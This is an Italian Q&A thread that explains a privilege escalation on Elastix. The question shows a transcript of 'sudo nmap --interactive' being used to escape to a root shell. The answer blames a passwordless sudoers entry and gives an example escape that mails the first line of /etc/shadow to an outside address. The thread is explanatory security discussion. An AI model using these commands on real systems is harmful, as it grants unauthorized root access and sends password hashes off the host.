Come funziona questa vulnerabilità di escalation di privilegi su Elastix?

2

Ecco una vulnerabilità di escalation di privilegi su Elastix:

# id
# uid=100(name) gid=101(name)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Come può un utente normale avviare nmap con privilegio sudo? Che cosa esattamente non è configurato correttamente qui?

Fonte: link

    
posta ramailo sathi 10.05.2016 - 21:02
fonte

1 risposta

3

L'errata configurazione verrebbe da un gruppo o da una voce utente in sudoers.conf . Questo è il file che controlla chi può fare cosa (riguardo a sudo). In questo caso, a giudicare dai tuoi comandi (se non sono stati modificati) il file sudoers contiene una voce per l'asterisco dell'utente per eseguire il comando sudo senza immettere una password.

Ora nel caso di nmap --interactive - che è stato rimosso qualche tempo fa. C'è stato un trucco di fuga che qualcuno potrebbe usare mentre in nmap per abusare del sistema. Per esempio:.

nmap> !head -n1 /etc/shadow | mail -s shadow [email protected]
    
risposta data 10.05.2016 - 21:27
fonte

Leggi altre domande sui tag